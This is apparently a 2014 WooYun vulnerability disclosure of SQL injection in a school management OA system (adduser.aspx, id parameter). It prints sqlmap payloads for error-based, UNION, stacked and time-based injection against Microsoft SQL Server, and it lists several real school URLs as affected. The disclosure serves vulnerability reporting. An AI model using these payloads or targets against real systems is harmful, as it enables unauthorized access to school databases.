当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076599

漏洞标题:某学校综合管理平台OAsql注入漏洞(影响大量学校)

相关厂商:上海安脉计算机科技有限公司

漏洞作者: 玉林嘎

提交时间:2014-09-21 23:35

修复时间:2014-12-20 23:36

公开时间:2014-12-20 23:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-21: 细节已通知厂商并且等待厂商处理中
2014-09-26: 厂商已经确认,细节仅向厂商公开
2014-09-29: 细节向第三方安全合作伙伴开放
2014-11-20: 细节向核心白帽子及相关领域专家公开
2014-11-30: 细节向普通白帽子公开
2014-12-10: 细节向实习白帽子公开
2014-12-20: 细节向公众公开

简要描述:

前台走一走

详细说明:

问题厂商:上海安脉计算机科技有限公司
谷歌百度:版权所有:上海安脉计算机科技有限公司
大量学校使用该系统 管理平台没发现漏洞,但是这套系统附带一套oa系统
/anmai/oa/adduser.aspx
在密码出现sql注入 只能手工不好利用

1.jpg


2.jpg


但是 这有个用户修改 只需添加参数id /anmai/oa/adduser.aspx?id=1 (id存在注入)
以该公司demo为例
http://www.anmai.net/anmai/oa/adduser.aspx?id=1
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1' AND 9850=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (9850=9850) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113))) AND 'HCnH'='HCnH
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=1' UNION ALL SELECT 67,CHAR(113)+CHAR(120)+CHAR(122)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(76)+CHAR(90)+CHAR(67)+CHAR(75)+CHAR(67)+CHAR(72)+CHAR(80)+CHAR(66)+CHAR(86)+CHAR(113)+CHAR(110)+CHAR(114)+CHAR(103)+CHAR(113),67,67,67,67,67,67--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1' WAITFOR DELAY '0:0:5'--
---
[11:10:22] [INFO] testing Microsoft SQL Server
[11:10:22] [INFO] confirming Microsoft SQL Server
[11:10:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 1.1.4322
back-end DBMS: Microsoft SQL Server 2005
[11:10:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[11:10:26] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.anmai.net'

漏洞证明:

其他例供证明:
http://bssyxxgl.eicbs.com/anmai/oa/addUser.aspx?id=1
http://www.gxbyzx.cn:88/ANMAI/oa/adduser.aspx?id=1
http://www.aqyz.net/anmai/oa/adduser.aspx?id=1
http://ps.imau.edu.cn/anmai/oa/addUser.aspx?id=1

修复方案:

参数过滤

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-09-26 10:16

厂商回复:

最新状态:

暂无